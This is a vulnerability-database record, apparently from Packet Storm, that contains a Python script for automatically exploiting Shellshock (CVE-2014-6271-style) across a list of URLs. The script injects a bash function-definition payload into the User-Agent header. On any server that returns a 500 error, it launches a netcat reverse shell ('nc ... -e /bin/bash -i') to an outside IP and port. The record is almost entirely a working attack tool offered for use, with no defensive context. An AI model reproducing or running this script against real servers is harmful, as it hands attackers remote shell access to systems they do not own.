{"id": "PACKETSTORM:133856", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Shell Shock Auto Exploitation Script", "description": "", "published": "2015-10-06T00:00:00", "modified": "2015-10-06T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/133856/Shell-Shock-Auto-Exploitation-Script.html", "reporter": "Rafay Baloch", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2016-11-03T10:29:42", "viewCount": 10, "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.4}, "_state": {"dependencies": 1678912101, "score": 1678911848, "epss": 1678924918}, "_internal": {"score_hash": "14316be99cabfef17fb2a14efe3266d9"}, "sourceHref": "https://packetstormsecurity.com/files/download/133856/shellshock-autoexploit.txt", "sourceData": "`#Title: Shell Shock Auto Exploitation Script \n# Author: Rafay Baloch \n \n \nimport requests,sys \n \nif (len(sys.argv) < 2): \nprint \"Usage: shocktest.py file.txt\" \nexit(0) \n \ndef main(): \nfile = sys.argv[1] \nwith open(file) as f: \nfile = f.read().splitlines() \nfor url in file: \ncmd=\"() { test;};/bin/nopatchobfu\" \nheaders = {'user-agent': cmd} \nr=requests.get(url, headers=headers) \nif r.status_code == 500: \nprint url,\"is Vulnerable\" \nprint \"Exploting..\" \nexp = '() { :; }; /bin/bash -c \"nc -v 1.0.0.1 1337 -e /bin/bash -i\"' \nhead = {'user-agent':exp} \nr=requests.get(url, headers=head) \nelif r.status_code: \nprint url, \"is not Vulnerable\" \n \nif __name__ == \"__main__\": \nmain() \n`\n"}
{}
Shell Shock Auto Exploitation Script